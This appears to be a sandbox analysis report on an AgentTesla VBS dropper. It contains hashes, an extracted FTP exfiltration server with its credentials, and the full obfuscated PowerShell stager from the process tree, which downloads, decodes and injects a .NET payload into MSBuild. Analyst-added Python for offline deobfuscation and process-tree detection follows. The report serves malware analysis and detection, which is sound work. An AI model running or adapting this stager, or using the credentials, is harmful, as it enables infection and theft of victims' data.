Analysis

  • max time kernel
    133s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06-11-2024 02:16

General

  • Target

    270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs

  • Size

    140KB

  • MD5

    cbcf626e71d764c178148e4637e333af

  • SHA1

    c3e2615fea0051e63e817c7ad9cc17b59d6da776

  • SHA256

    270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff

  • SHA512

    da100c32335caf638e6ccdb0ec37c6e0c6596dfc98b09ef7c39c20911ddadc4576adb67e58187a008be6183bf7cfe89646558bb9abed10374d9e9c5902111fb3

  • SSDEEP

    3072:ky7jgt5pEGwprytIsaK18meFZjcrsmiYADap1Ff:KRQjcQmiMp1Ff

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
    exe.dropper
    https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.stingatoareincendii.ro
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    3.*RYhlG)lkA

Signatures

  • AgentTesla

    Agent Tesla is a .NET-based remote access tool (RAT) and information stealer (Visual Basic .NET).

  • Agenttesla family
  • Blocklisted process makes network request (3 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)

    Runs PowerShell with its display window hidden.

  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely for geofencing.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Looks up external IP address via web service (1 IoC)

    Uses a legitimate IP lookup service to find the infected system's external IP address.

  • Suspicious use of SetThreadContext (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery (1 TTP, 1 IoC)

    Attempts to gather information about the victim system's language in order to infer the host's geographical location.

  • Suspicious behavior: EnumeratesProcesses (6 IoCs)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of WriteProcessMemory (12 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdWICcqbURyKicpLm5hbUVbMywxMSwyXS1KT2luJycpKCgnZHZ1aW1hJysnZ2VVcmwgPSBGZ2EnKydodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFVeUhxd3JuWENsS0JKM2o2M0xsMXQyU3RWZ0d4YlN0MCBGZ2E7ZHZ1d2ViQ2xpZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtkdnVpbWFnZUJ5dGVzID0gZHZ1d2ViQ2xpZW50LkQnKydvd25sb2FkRGF0YShkdnVpbWFnZVVybCknKyc7JysnZHZ1JysnaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC4nKydHZXRTJysndHJpbmcoZHZ1aW1hZ2VCeXRlJysncyk7ZHZ1c3RhcnRGbGFnID0gRmdhPDxCQVNFNjRfU1RBUlQnKyc+PkZnYTtkdnVlbmRGbGFnID0gRmdhPDxCQVNFNjRfRU5EPj5GZ2E7ZHZ1c3RhcnRJbmRleCA9IGR2dWltYWdlVGV4dC5JbmRleE9mKGR2dXN0YXJ0RmxhZyk7ZHZ1ZW5kSW5kZXggPSBkdnVpbWFnZVRleHQuSW5kZXhPZihkdnVlbmRGbGEnKydnKTtkdnVzdGFydEluZGV4IC1nZSAwIC1hbmQgZHZ1ZW5kSW5kZXggLWd0IGR2dXN0YXJ0SW5kZXg7ZHZ1c3RhcnRJbmRleCArPSBkdnVzdGFydEZsYWcuTCcrJ2VuZ3RoO2R2dWJhc2U2NExlbmd0aCA9IGR2dWVuZEluZGV4IC0gZHZ1c3RhcnRJbmRleDtkdnViYXNlNjRDb21tYW5kID0gZHZ1aW1hZ2VUZXh0LlN1YnN0cmluZyhkdnVzdGFydEluZGV4LCBkdnUnKydiYXNlNjRMZW5ndGgpO2R2dWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGR2dWJhc2U2NENvbW1hbmQuVG9DaGFyQXInKydyYXkoKSBiSFogRm9yRWFjaC1PYmplY3QgeyBkdnVfIH0pWy0xLi4tKGR2dWJhcycrJ2U2NENvbW1hbmQuTGVuZ3RoKV07ZHZ1Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhkdnViYXNlNjRSZXZlcnNlZCk7ZHZ1bG9hZGVkQXNzZScrJ21ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGR2dWNvbW1hbmRCeXRlcyk7ZHZ1dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChGZ2FWQUlGZ2EpO2R2dXZhaU1ldGhvZC5JbnZva2UoZHZ1bnVsbCwgQChGZ2F0eHQub29vb2RlZXZ2di8zODEuMTQyLjk0MS41NC8vOnB0dGhGZ2EsIEZnYScrJ2Rlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aXZhZG9GZ2EsIEZnYU1TQnVpbGRGZ2EsICcrJ0ZnYWRlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aScrJ3ZhZG9GZ2EsRmdhZGVzYXRpJysndmFkb0ZnYSxGJysnZycrJ2FkZXNhdGl2YScrJ2RvRmdhLEZnYWRlc2F0aXZhZG9GZ2EsRmdhZGVzYXRpdmFkb0ZnYSxGZ2FkZXNhdGl2YWRvRmdhLEZnYTFGZ2EsRmdhZGVzYXRpdmFkb0ZnYSkpOycpLnJlcGxBY0UoJ2JIWicsJ3wnKS5yZXBsQWNFKChbY2hhcl0xMDArW2NoYXJdMTE4K1tjaGFyXTExNyksJyQnKS5yZXBsQWNFKCdGZ2EnLFtzdHJpbmddW2NoYXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1132
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((gV '*mDr*').namE[3,11,2]-JOin'')(('dvuima'+'geUrl = Fga'+'https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 Fga;dvuwebClien'+'t = New-Object System.Net.WebClient;dvuimageBytes = dvuwebClient.D'+'ownloadData(dvuimageUrl)'+';'+'dvu'+'imageText = [System.Text.Encoding]::UTF8.'+'GetS'+'tring(dvuimageByte'+'s);dvustartFlag = Fga<<BASE64_START'+'>>Fga;dvuendFlag = Fga<<BASE64_END>>Fga;dvustartIndex = dvuimageText.IndexOf(dvustartFlag);dvuendIndex = dvuimageText.IndexOf(dvuendFla'+'g);dvustartIndex -ge 0 -and dvuendIndex -gt dvustartIndex;dvustartIndex += dvustartFlag.L'+'ength;dvubase64Length = dvuendIndex - dvustartIndex;dvubase64Command = dvuimageText.Substring(dvustartIndex, dvu'+'base64Length);dvubase64Reversed = -join (dvubase64Command.ToCharAr'+'ray() bHZ ForEach-Object { dvu_ })[-1..-(dvubas'+'e64Command.Length)];dvucommandByt'+'es = [System.Convert]::FromBase64String(dvubase64Reversed);dvuloadedAsse'+'mbly = [System.Reflection.Assembly]::Load(dvucommandBytes);dvuvaiMethod = [dnlib.IO.Home].GetMethod(FgaVAIFga);dvuvaiMethod.Invoke(dvunull, @(Fgatxt.oooodeevvv/381.142.941.54//:ptthFga, Fga'+'desativadoFga, FgadesativadoFga, FgadesativadoFga, FgaMSBuildFga, '+'FgadesativadoFga, Fgadesati'+'vadoFga,Fgadesati'+'vadoFga,F'+'g'+'adesativa'+'doFga,FgadesativadoFga,FgadesativadoFga,FgadesativadoFga,Fga1Fga,FgadesativadoFga));').replAcE('bHZ','|').replAcE(([char]100+[char]118+[char]117),'$').replAcE('Fga',[string][char]39) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3612
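
The stage-2 command in the process tree above is only lightly obfuscated: string literals are split with '+', the pipe is spelled bHZ, the dollar sign dvu and the single quote Fga, and the downloaded carrier is searched for <<BASE64_START>>/<<BASE64_END>> markers, the text between them reversed, base64-decoded and handed to Assembly.Load before dnlib.IO.Home.VAI is invoked. The following Python is an added analyst-side reconstruction of that chain, not code from the sample or the sandbox. The OBFUSCATED_EXCERPT is copied from the decoded command above (with the rest of the script omitted); the carrier text and the MZ-prefixed payload are constructed so the script runs offline.

```python
"""Static emulation of the stage-2 PowerShell deobfuscation seen in the process tree."""
import base64
import re

# Substitutions the stager applies with .replAcE() before executing the
# string: 'bHZ' stands in for '|', 'dvu' for '$', and 'Fga' for a single quote.
REPLACEMENTS = (("bHZ", "|"), ("dvu", "$"), ("Fga", "'"))
START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"


def join_concats(script: str) -> str:
    """Collapse PowerShell 'abc'+'def' string splitting into one literal."""
    return re.sub(r"'\s*\+\s*'", "", script)


def deobfuscate_stage2(script: str) -> str:
    """Reproduce the replAcE() chain so the script reads as plain PowerShell."""
    out = join_concats(script)
    for needle, replacement in REPLACEMENTS:
        out = out.replace(needle, replacement)
    return out


def extract_embedded_assembly(carrier_text: str) -> bytes:
    """Cut the marker-delimited blob out of the downloaded text, un-reverse it
    and base64-decode it; this is the byte[] the stager gives Assembly.Load()."""
    start = carrier_text.find(START_FLAG)
    end = carrier_text.find(END_FLAG)
    if start < 0 or end <= start:
        raise ValueError("BASE64_START/BASE64_END markers not found")
    blob = carrier_text[start + len(START_FLAG):end]
    return base64.b64decode(blob[::-1], validate=True)


def invoke_args(plain_script: str) -> list[str]:
    """Return the quoted arguments passed to dnlib.IO.Home.VAI via Invoke()."""
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\);", plain_script, re.S)
    return re.findall(r"'([^']*)'", m.group(1)) if m else []


def recover_iocs(obfuscated_script: str) -> dict:
    """What an analyst wants from the stager without running it."""
    plain = deobfuscate_stage2(obfuscated_script)
    url_match = re.search(r"\$imageUrl\s*=\s*'([^']+)'", plain)
    args = invoke_args(plain)
    return {
        "stage2_download": url_match.group(1).strip() if url_match else None,
        # The loader's first argument is written backwards ('ptth' -> 'http').
        "loader_url": args[0][::-1] if args else None,
        "invoke_args": args,
    }


# Constructed excerpt: the relevant pieces of the obfuscated command, copied
# from the sandbox process tree; the rest of the script is omitted.
OBFUSCATED_EXCERPT = (
    "dvuima'+'geUrl = Fga'+'https://drive.google.com/uc?export=download&id="
    "1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 Fga;"
    "dvustartFlag = Fga<<BASE64_START'+'>>Fga;dvuendFlag = Fga<<BASE64_END>>Fga;"
    "dvubase64Reversed = -join (dvubase64Command.ToCharAr'+'ray() bHZ "
    "ForEach-Object { dvu_ })[-1..-(dvubas'+'e64Command.Length)];"
    "dvuvaiMethod = [dnlib.IO.Home].GetMethod(FgaVAIFga);"
    "dvuvaiMethod.Invoke(dvunull, @(Fgatxt.oooodeevvv/381.142.941.54//:ptthFga, "
    "Fga'+'desativadoFga, FgadesativadoFga, FgadesativadoFga, FgaMSBuildFga, "
    "'+'FgadesativadoFga, Fgadesati'+'vadoFga,Fgadesati'+'vadoFga,F'+'g'+'adesativa"
    "'+'doFga,FgadesativadoFga,FgadesativadoFga,FgadesativadoFga,Fga1Fga,"
    "FgadesativadoFga));"
)


def build_carrier(payload: bytes, noise: str = "lorem ipsum ") -> str:
    """Constructed stand-in for the Google Drive download: text with the
    reversed base64 assembly wrapped in the markers the stager looks for."""
    reversed_b64 = base64.b64encode(payload).decode()[::-1]
    return f"{noise}{START_FLAG}{reversed_b64}{END_FLAG}{noise}"


if __name__ == "__main__":
    print(recover_iocs(OBFUSCATED_EXCERPT))
    print(extract_embedded_assembly(build_carrier(b"MZ\x90\x00constructed")))
```

Read backwards, the first Invoke() argument is an http URL on 45.149.241.183, the loader's own download location; the fifth argument, MSBuild, names the process the decoded assembly is told to inject into, which matches the MSBuild.exe child (PID 3612) and the SetThreadContext signature above. Note that extract_embedded_assembly() rejects a carrier whose markers are missing or out of order, where the original script only evaluates a boolean and carries on.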

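The chain above (WScript.exe launching PowerShell with a hidden window, execution-policy bypass and a multi-kilobyte base64 argument, which then starts MSBuild.exe with no project file) is detectable from process-creation telemetry alone. The following Python is an added example of that detection logic, not part of the sandbox report: the events are constructed to mirror the tree above (PIDs taken from the report, command lines abridged, the $Codigo blob replaced by a constructed base64 string), plus a benign devenv-started MSBuild as a control.

```python
"""Process-tree detection for the WScript -> PowerShell -> MSBuild chain."""
import base64
import re
from dataclasses import dataclass
from typing import Iterable

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / Security 4688 shape)."""
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> list[str]:
    """Return the names of every rule this event trips."""
    hits = []
    parent = by_pid.get(ev.ppid)
    cmd = ev.cmdline
    # 1. A script host (WScript here) launching PowerShell.
    if parent and parent.name in SCRIPT_HOSTS and ev.name in {"powershell.exe", "pwsh.exe"}:
        hits.append("script_host_spawns_powershell")
    # 2. Hidden window plus execution-policy bypass; \w* also covers the short
    #    forms -w / -ep / -exec that PowerShell accepts.
    if re.search(r"-w\w*\s+hidden", cmd, re.I) and re.search(r"-e\w*\s+bypass", cmd, re.I):
        hits.append("hidden_window_policy_bypass")
    # 3. A long base64-looking token on the command line (the $Codigo blob).
    if re.search(r"[A-Za-z0-9+/]{200,}={0,2}", cmd):
        hits.append("long_base64_argument")
    # 4. MSBuild started from a shell with nothing but its own path: no project
    #    to build is the injection tell (SetThreadContext in the report).
    if (ev.name == "msbuild.exe" and parent and parent.name in SHELLS
            and re.fullmatch(r'\s*"?[^"]*msbuild\.exe"?\s*', cmd, re.I)):
        hits.append("msbuild_without_project")
    return hits


def evaluate(events: Iterable[ProcEvent]) -> dict[int, list[str]]:
    """Run every rule over every event; map pid -> rules tripped (hits only)."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    for ev in by_pid.values():
        hits = check_event(ev, by_pid)
        if hits:
            findings[ev.pid] = hits
    return findings


def ancestry(pid: int, by_pid: dict[int, ProcEvent]) -> list[str]:
    """Image names from the process up to the root, for alert context."""
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return chain


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
# Constructed stand-in for the ~2 KB $Codigo blob on the real command line.
FAKE_BLOB = base64.b64encode(bytes(range(256))).decode()

# Constructed events mirroring the sandbox tree (PIDs from the report).
EVENTS = [
    ProcEvent(4936, 1, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sample.vbs"'),
    ProcEvent(1132, 4936, PS,
              f"\"{PS}\" -command $Codigo = '{FAKE_BLOB}';$OWjuxd = ...;"
              "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"),
    ProcEvent(5004, 1132, PS,
              f"\"{PS}\" -windowstyle hidden -executionpolicy bypass -NoProfile -command \". ((gV '*mDr*').namE[3,11,2]-JOin'')(...)\""),
    ProcEvent(3612, 5004, MSBUILD, f"\"{MSBUILD}\""),
    # Benign control: Visual Studio building a project (constructed).
    ProcEvent(6999, 1, r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              r'"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"'),
    ProcEvent(7000, 6999, MSBUILD, f"\"{MSBUILD}\" C:\\src\\app.csproj /t:Build"),
]


if __name__ == "__main__":
    by_pid = {e.pid: e for e in EVENTS}
    for pid, rules in evaluate(EVENTS).items():
        print(pid, " <- ".join(ancestry(pid, by_pid)), rules)
```

Rule 4 is the one worth tuning in production: MSBuild.exe with no arguments is rare on workstations but legitimate build servers may still trip it, so scope it to parents in SHELLS as done here rather than alerting on any argument-less MSBuild.
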
Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    3ca1082427d7b2cd417d7c0b7fd95e4e

    SHA1

    b0482ff5b58ffff4f5242d77330b064190f269d3

    SHA256

    31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

    SHA512

    bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kn3apgcv.gre.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1132-12-0x00007FFFD1D30000-0x00007FFFD27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-0-0x00007FFFD1D33000-0x00007FFFD1D35000-memory.dmp

    Filesize

    8KB

  • memory/1132-22-0x00007FFFD1D30000-0x00007FFFD27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-11-0x00007FFFD1D30000-0x00007FFFD27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-6-0x000001D5D2AF0000-0x000001D5D2B12000-memory.dmp

    Filesize

    136KB

  • memory/1132-30-0x00007FFFD1D30000-0x00007FFFD27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3612-24-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3612-31-0x0000000005A90000-0x0000000006034000-memory.dmp

    Filesize

    5.6MB

  • memory/3612-32-0x00000000055E0000-0x0000000005646000-memory.dmp

    Filesize

    408KB

  • memory/3612-33-0x00000000068E0000-0x0000000006972000-memory.dmp

    Filesize

    584KB

  • memory/3612-34-0x0000000006980000-0x00000000069D0000-memory.dmp

    Filesize

    320KB

  • memory/3612-35-0x0000000006AD0000-0x0000000006ADA000-memory.dmp

    Filesize

    40KB

  • memory/5004-23-0x0000029A129B0000-0x0000029A12B08000-memory.dmp

    Filesize

    1.3MB